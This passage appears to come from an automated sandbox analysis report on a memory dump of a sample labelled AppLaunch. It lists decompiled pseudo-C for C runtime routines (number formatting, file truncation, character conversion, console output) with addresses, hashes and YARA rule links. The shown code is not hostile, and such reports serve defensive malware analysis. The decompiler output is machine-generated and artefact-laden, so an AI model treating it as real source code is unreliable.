							_t18 = _t177 + 1; // 0x42f597
							_t165 = _t18;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t26 =  &(_t165[0]); // 0x42f597
								_t178 = _t26;
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E00424B20( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E00434DA2(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t50 = _t178 - 1; // 0x42f597
									_t118 = _t50;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E00427330(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E00424B20( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t168 = _t105 + 2;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E0043EF50();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E0043EF50();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E0043EF50();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t174 = _t168 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E00434896(_t133, _t139, _t164, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E0043F120(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E00429369(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E0042928F();
				goto L66;
			}

0x00434587
0x00434592
0x00434597
0x00434599
0x00434599
0x0043459d
0x004345a6
0x004345a8
0x004345ad
0x004345b0
0x004345b3
0x004345c9
0x004345cc
0x004345d1
0x004345db
0x004345e0
0x00434637
0x00434639
0x00434648
0x0043464b
0x0043464b
0x0043464e
0x00434650
0x00434657
0x00434669
0x0043466c
0x00434671
0x00434675
0x00434676
0x00434696
0x00434699
0x00434699
0x00434699
0x0043469b
0x0043469b
0x0043469b
0x0043469e
0x004346a1
0x004346a3
0x004346b4
0x004346a5
0x004346a5
0x004346a5
0x004346b6
0x004346bb
0x004346bb
0x004346c0
0x004346c3
0x004346cd
0x004346cf
0x004346d1
0x004346d6
0x004346d7
0x004346da
0x004346dd
0x004346e0
0x004346e0
0x004346e2
0x00000000
0x00000000
0x004346f9
0x00434700
0x00434704
0x00434707
0x0043470a
0x0043470c
0x0043470c
0x0043470c
0x00434712
0x00434715
0x00434719
0x0043471b
0x0043471f
0x00434722
0x00434725
0x00434726
0x00434729
0x0043472c
0x0043472f
0x0043472f
0x00434734
0x00434737
0x0043473a
0x00000000
0x00000000
0x00434743
0x00434748
0x0043474b
0x0043474d
0x00000000
0x00000000
0x00434751
0x00434751
0x00434754
0x00434755
0x00434755
0x00434757
0x0043475a
0x00000000
0x00000000
0x0043475c
0x0043475f
0x00434766
0x00434769
0x0043476c
0x00434781
0x00434781
0x00434781
0x0043476e
0x0043476e
0x00434771
0x0043477b
0x0043477b
0x00434773
0x00434776
0x00434776
0x0043477d
0x0043477d
0x00000000
0x0043476c
0x00434761
0x00434761
0x00434763
0x00434763
0x004346c5
0x004346c5
0x004346c7
0x00434784
0x00434784
0x00434786
0x00434788
0x0043478b
0x0043478c
0x0043478d
0x0043478e
0x00434796
0x00434796
0x00434798
0x00434798
0x0043479b
0x0043479e
0x004347a1
0x004347a3
0x004347a5
0x004347a5
0x004347b2
0x004347b9
0x004347c0
0x004347c2
0x004347cb
0x004347cb
0x004347ce
0x004347d0
0x004347d3
0x004347d6
0x004347e2
0x004347e2
0x004347e6
0x004347e9
0x004347eb
0x00000000
0x004347d8
0x004347d8
0x004347de
0x004347de
0x004347ec
0x004347ec
0x004347ef
0x004347f3
0x004347f4
0x004347f6
0x004347f8
0x004347fa
0x00434824
0x00434824
0x00434826
0x00434833
0x00434833
0x00434834
0x00434835
0x00434837
0x00434839
0x0043483e
0x00434840
0x00434844
0x00434847
0x0043484a
0x0043484c
0x0043484d
0x0043484d
0x0043484f
0x0043484f
0x00434851
0x0043485e
0x0043485e
0x0043485f
0x00434860
0x00434862
0x00434863
0x00434864
0x0043486d
0x00434870
0x00434872
0x00434873
0x00434873
0x00434875
0x00434875
0x00434875
0x00434878
0x0043487a
0x0043487d
0x0043487f
0x00434885
0x0043488a
0x0043488a
0x00434895
0x00434895
0x00434853
0x00434855
0x00000000
0x00000000
0x00434857
0x00000000
0x00000000
0x00434859
0x0043485c
0x00000000
0x00000000
0x00000000
0x0043485c
0x00434828
0x0043482a
0x00000000
0x00000000
0x0043482c
0x00000000
0x00000000
0x0043482e
0x00434831
0x00000000
0x00000000
0x00000000
0x00434831
0x004347fc
0x00434801
0x00434807
0x00434807
0x00434808
0x00434809
0x0043480a
0x0043480c
0x00434811
0x00434813
0x00434815
0x0043481a
0x0043481d
0x0043481f
0x00434822
0x00434822
0x00000000
0x00434822
0x00434803
0x00434805
0x00000000
0x00000000
0x00000000
0x00434805
0x004347da
0x004347dc
0x00000000
0x00000000
0x00000000
0x004347dc
0x004347d6
0x00000000
0x004346c7
0x004346c3
0x00434678
0x00434684
0x00434684
0x00434686
0x0043468d
0x00000000
0x0043468d
0x00434688
0x00000000
0x00434688
0x0043463b
0x00434641
0x00434641
0x00434644
0x00434644
0x00434645
0x00000000
0x00434645
0x0043463d
0x0043463f
0x00000000
0x00000000
0x00000000
0x0043463f
0x004345fd
0x00434602
0x00434604
0x00434611
0x00434618
0x0043461a
0x00434625
0x00434625
0x00434628
0x0043462a
0x0043462a
0x0043462e
0x00434606
0x00434606
0x00434606
0x00000000
0x00434604
0x004345b5
0x004345bc
0x004345bd
0x004345bf
0x00000000

APIs

_strrchr.LIBCMT ref: 00434611

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 2945c54eb1e36c3cc41d26e292952d17494aa8050bae87f1c8c9aaa3df5a4454
Instruction ID: d242b5d4b58671894fc6f43e6b17d9a2dafe1faf45f1ccaf4160cfb1597005bd
Opcode Fuzzy Hash: 2945c54eb1e36c3cc41d26e292952d17494aa8050bae87f1c8c9aaa3df5a4454
Instruction Fuzzy Hash: F7B156369002859FDB15DF69C8817EEBBE5EF9A314F24516BE8449B341D33CAD01CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0043CE2E Relevance: 6.1, APIs: 4, Instructions: 132
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0043CE2E(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t62;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E0043CDE1( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E00429369(__eflags)));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E0043C4A9(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if(__eflags == 0) {
							goto L28;
						}
						__eflags = SetEndOfFile(E00437583(_t50));
						if(__eflags != 0) {
							L18:
							_t59 = 0;
							L29:
							E0043C4A9(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E00429369(__eflags))) = 0xd;
						_t36 = E00429356(__eflags);
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E00436150(0x1000, 1);
						_pop(_t54);
						_t70 = _t62;
						if(_t62 != 0) {
							_v12 = E00431752(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E00438E54(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E00429356(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E00429369(__eflags))) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E00429369(_t70)));
										E00432BD6(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E00431752(_t56, _t50, _v12);
							E00432BD6(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E00429369(_t70))) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}

0x0043ce2e
0x0043ce37
0x0043ce46
0x0043ce54
0x0043cf7d
0x0043cf82
0x00000000
0x0043ce69
0x0043ce69
0x0043ce6c
0x0043ce6f
0x0043ce72
0x0043ce74
0x0043cf39
0x0043cf42
0x0043cf49
0x0043cf4c
0x0043cf4f
0x00000000
0x00000000
0x0043cf5f
0x0043cf61
0x0043cf06
0x0043cf06
0x0043cf84
0x0043cf8f
0x0043cf9d
0x0043cf9d
0x0043cf68
0x0043cf6e
0x0043cf7b
0x00000000
0x0043cf7b
0x0043ce7a
0x0043ce90
0x0043ce93
0x0043ce94
0x0043ce96
0x0043ceb1
0x0043ceb4
0x0043ceb7
0x0043ceb8
0x0043ceb8
0x0043ceba
0x0043cecd
0x0043cecd
0x0043cecf
0x0043ced2
0x0043ced7
0x0043ceda
0x0043cedd
0x0043cf0f
0x0043cf12
0x0043cf19
0x0043cf19
0x0043cf1f
0x0043cf25
0x0043cf27
0x00000000
0x0043cf2c
0x0043cedf
0x0043cee0
0x0043cee2
0x0043cee5
0x0043cee7
0x0043ceea
0x0043ceec
0x0043cec6
0x0043cec6
0x00000000
0x0043cec6
0x0043ceee
0x00000000
0x00000000
0x00000000
0x0043ceee
0x0043cebc
0x00000000
0x00000000
0x0043cebe
0x0043cec4
0x00000000
0x00000000
0x00000000
0x0043cef0
0x0043cef0
0x0043cef0
0x0043cef8
0x0043cefe
0x0043cf03
0x00000000
0x0043cf03
0x0043ce9d
0x00000000
0x0043cf2f
0x0043cf2f
0x0043cf31
0x00000000
0x00000000
0x0043cf33
0x00000000
0x00000000
0x0043cf35
0x0043cf37
0x00000000
0x00000000
0x00000000
0x0043cf37
0x0043ce7a

APIs

_free.LIBCMT ref: 0043CEFE
_free.LIBCMT ref: 0043CF27
SetEndOfFile.KERNEL32(00000000,0043975C,00000000,?,?,?,?,?,?,?,?,0043975C,?,00000000), ref: 0043CF59
GetLastError.KERNEL32(?,?,?,?,?,?,?,0043975C,?,00000000,?,?,?,?,?), ref: 0043CF75

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 4590e76a106cba6daa2f9fadb45d627fa6c752796ea8d804f4b6f7187e3c94bd
Instruction ID: ee115d69ed5e544e5d7f1d9de8ccffad14e8d7bd1ee7eef6634adf30cd7cc2f1
Opcode Fuzzy Hash: 4590e76a106cba6daa2f9fadb45d627fa6c752796ea8d804f4b6f7187e3c94bd
Instruction Fuzzy Hash: 1341C832600601ABDB11ABB6DC82B9E7766AF4C364F14251BF914F72D1D63CCD40476D

Uniqueness

Uniqueness Score: -1.00%

Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004361C5(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E00437047(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E00437047(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E00429333(GetLastError());
									_t19 =  *((intOrPtr*)(E00429369(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E0043678B(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00429333(GetLastError());
						return  *((intOrPtr*)(E00429369(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E0043678B(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E0042D7C8(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x004361cc
0x004361d1
0x004361ef
0x004361f1
0x004361f4
0x00436221
0x00436229
0x0043622b
0x00436244
0x00436247
0x0043624a
0x00436258
0x00436267
0x0043626f
0x00436271
0x0043628a
0x0043628d
0x0043628d
0x00436273
0x0043627a
0x00436285
0x00436285
0x0043628f
0x00000000
0x0043628f
0x0043624f
0x00436254
0x00436256
0x00000000
0x00000000
0x00000000
0x00436256
0x00436234
0x00000000
0x0043623f
0x004361f6
0x004361f9
0x004361fc
0x0043620f
0x00436212
0x004361e5
0x004361e5
0x00000000
0x004361e8
0x00436202
0x00436207
0x00436209
0x00436293
0x00436293
0x00000000
0x00436209
0x004361d3
0x004361d8
0x004361dd
0x004361df
0x004361e2
0x00000000

APIs

Part of subcall function 0042D7C8: _free.LIBCMT ref: 0042D7D6

Part of subcall function 00437047: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0043C0B0,?,00000000,00000000), ref: 004370F3

GetLastError.KERNEL32 ref: 0043622D
__dosmaperr.LIBCMT ref: 00436234
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00436273
__dosmaperr.LIBCMT ref: 0043627A

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: e8d3c4542c20c7474086e43395adce78f594d2faf41511c4f7fc07ac3b5d17ee
Instruction ID: 31c412ec3a6f2348aecf8cbce601c7c6ed621ff3a87caa81cccf04ec6464633a
Opcode Fuzzy Hash: e8d3c4542c20c7474086e43395adce78f594d2faf41511c4f7fc07ac3b5d17ee
Instruction Fuzzy Hash: BA21C9716002167F9B20AF629C4182BB7ACEF48368F52D55EF928D3241D738EC104798

Uniqueness

Uniqueness Score: -1.00%

Function 00419CA0 Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00419CA0(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				signed int _t18;
				signed char _t19;

				_v8 = __ecx;
				_t18 = E00418E50(_a4, __eflags) & 0x000000ff;
				_t43 = _t18;
				if(_t18 == 0) {
					_t19 = E004198B0(_a4, _t43);
					_t44 = _t19 & 0x000000ff;
					if((_t19 & 0x000000ff) == 0) {
						E00419DE0(_v8, E004193B0(_a4));
						return E00419DE0(_a4, 0);
					}
					_v12 = E004193B0(_a4);
					_v16 =  *((intOrPtr*)( *_v12 + 4));
					E00419DE0(_v8, _v16(_v8));
					return E00419F10(_a4, _t44);
				}
				return _t18;
			}

0x00419ca6
0x00419cb1
0x00419cb4
0x00419cb6
0x00419cbb
0x00419cc3
0x00419cc5
0x00419d06
0x00000000
0x00419d10
0x00419ccf
0x00419cda
0x00419ceb
0x00000000
0x00419cf3
0x00419d18

APIs

std::ios_base::good.LIBCPMTD ref: 00419CAC
_Func_class.LIBCONCRTD ref: 00419CEB

Part of subcall function 00419F10: std::ios_base::good.LIBCPMTD ref: 00419F1C
Part of subcall function 00419F10: _Func_class.LIBCONCRTD ref: 00419F67

_Func_class.LIBCONCRTD ref: 00419D06
_Func_class.LIBCONCRTD ref: 00419D10

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Func_class$std::ios_base::good
String ID:
API String ID: 3908080139-0
Opcode ID: 44f9da86bc4b3b208254ae65454b89e52de47851c6e7ff5a43f75116b0083e1d
Instruction ID: 68c767c06068ead0e32234691067c3a18a439d44eb275e1f6c491bebfa2d3e4a
Opcode Fuzzy Hash: 44f9da86bc4b3b208254ae65454b89e52de47851c6e7ff5a43f75116b0083e1d
Instruction Fuzzy Hash: F601A574A04109ABCB04EF55D8719EEB775AF44344F10806EF90A9B395DF34AE81DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00402AA3 Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402AA3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t22;
				signed int _t39;

				E00406400(_t39 - 0x495, __eflags, _t39 - 0x494);
				_t36 = _t39 - 0x4a0;
				E00406430(_t39 - 0x496, __eflags, _t39 - 0x4a0);
				E00406490(_t39 - 0x497, __eflags, _t39 - 0x4a4);
				E00416980(_t39 - 0x420);
				E00416980(_t39 - 0x438);
				 *((char*)(_t39 - 0x48b)) = 0;
				E00416980(__ebx + 8);
				E00416980(__ebx + 0x20);
				_t22 =  *((intOrPtr*)(_t39 - 0x48b));
				return E00424900(_t22, __ebx,  *(_t39 - 4) ^ _t39, _t36, __edi, __esi);
			}

0x00402b93
0x00402b98
0x00402ba5
0x00402bb7
0x00402bc2
0x00402bcd
0x00402bd2
0x00402bdc
0x00402be4
0x00402be9
0x00402bff

APIs

task.LIBCPMTD ref: 00402BC2
task.LIBCPMTD ref: 00402BCD
task.LIBCPMTD ref: 00402BDC
task.LIBCPMTD ref: 00402BE4

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 6f4b4034b12335a4a19fabe710c504fb09713e40cd411678dcf5b27898801b26
Instruction ID: c7f04fe0f3be0e24981bbef5ccedc1c81e830e82974c2933a284364302bbc218
Opcode Fuzzy Hash: 6f4b4034b12335a4a19fabe710c504fb09713e40cd411678dcf5b27898801b26
Instruction Fuzzy Hash: F9F0C2F15600184BCB14EB11CC91AEDB338AF54308F8101EEA54E26092DF345F84DF9D

Uniqueness

Uniqueness Score: -1.00%

Function 0043D4FA Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043D4FA(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x4c6a50, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0043D4E3();
					E0043D4A5();
					_t13 = WriteConsoleW( *0x4c6a50, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x0043d517
0x0043d51b
0x0043d528
0x0043d52d
0x0043d548
0x0043d548
0x0043d54e

APIs

WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,00000000,?,0043C4E2,00000000,00000001,00000000,00000000,?,004389BE,?,00000000,00000000), ref: 0043D511
GetLastError.KERNEL32(?,0043C4E2,00000000,00000001,00000000,00000000,?,004389BE,?,00000000,00000000,?,00000000,?,00438F0A,0043B4D3), ref: 0043D51D

Part of subcall function 0043D4E3: CloseHandle.KERNEL32(FFFFFFFE,0043D52D,?,0043C4E2,00000000,00000001,00000000,00000000,?,004389BE,?,00000000,00000000,?,00000000), ref: 0043D4F3

___initconout.LIBCMT ref: 0043D52D

